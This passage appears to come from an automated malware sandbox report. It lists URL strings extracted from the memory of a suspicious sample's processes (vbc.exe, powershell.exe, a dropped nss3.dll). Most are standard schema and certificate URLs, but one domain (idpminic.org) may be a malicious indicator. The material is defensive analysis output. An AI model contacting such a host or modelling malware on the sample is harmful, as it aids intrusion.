Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: vbc.exe, 00000002.00000002.374200446.000000000760A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.375395797.000000000764A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://idpminic.org
Source: vbc.exe, 00000002.00000002.365917847.00000000059D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: N2wufLmC74.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: N2wufLmC74.exe, nss3.dll.53.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: nss3.dll.53.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: nss3.dll.53.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: N2wufLmC74.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: N2wufLmC74.exe	String found in binary or memory: http://ocsp.entrust.net00
Source: N2wufLmC74.exe	String found in binary or memory: http://ocsp.entrust.net05
Source: powershell.exe, 00000024.00000002.531384046.0000022780208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: N2wufLmC74.exe	String found in binary or memory: http://pki.eset.com/crl/csca2020.crl0I
Source: N2wufLmC74.exe	String found in binary or memory: http://pki.eset.com/crl/rootca2020.crl0?
Source: N2wufLmC74.exe	String found in binary or memory: http://pki.eset.com/crl/tsca2020.crl0?
Source: N2wufLmC74.exe	String found in binary or memory: http://pki.eset.com/crt/csca2020.crt05
Source: N2wufLmC74.exe	String found in binary or memory: http://pki.eset.com/crt/rootca2020.crt07
Source: N2wufLmC74.exe	String found in binary or memory: http://pki.eset.com/crt/tsca2020.crt05
Source: N2wufLmC74.exe	String found in binary or memory: http://pki.eset.com/csp0
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 00000024.00000002.531384046.0000022780208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.520358635.0000022780001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: powershell.exe, 00000024.00000002.531384046.0000022780208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.379999240.0000000007764000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.379999240.0000000007764000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.379999240.0000000007764000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.385441891.00000000077F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.398763861.000000000794B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: vbc.exe, 00000002.00000002.398708045.0000000007947000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14V
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.385441891.00000000077F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.385441891.00000000077F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Responseon
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.379999240.0000000007764000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Responseon
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.376717472.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: vbc.exe, 00000002.00000002.368935765.0000000007461000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: vbc.exe, 00000002.00000002.370621477.00000000074EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
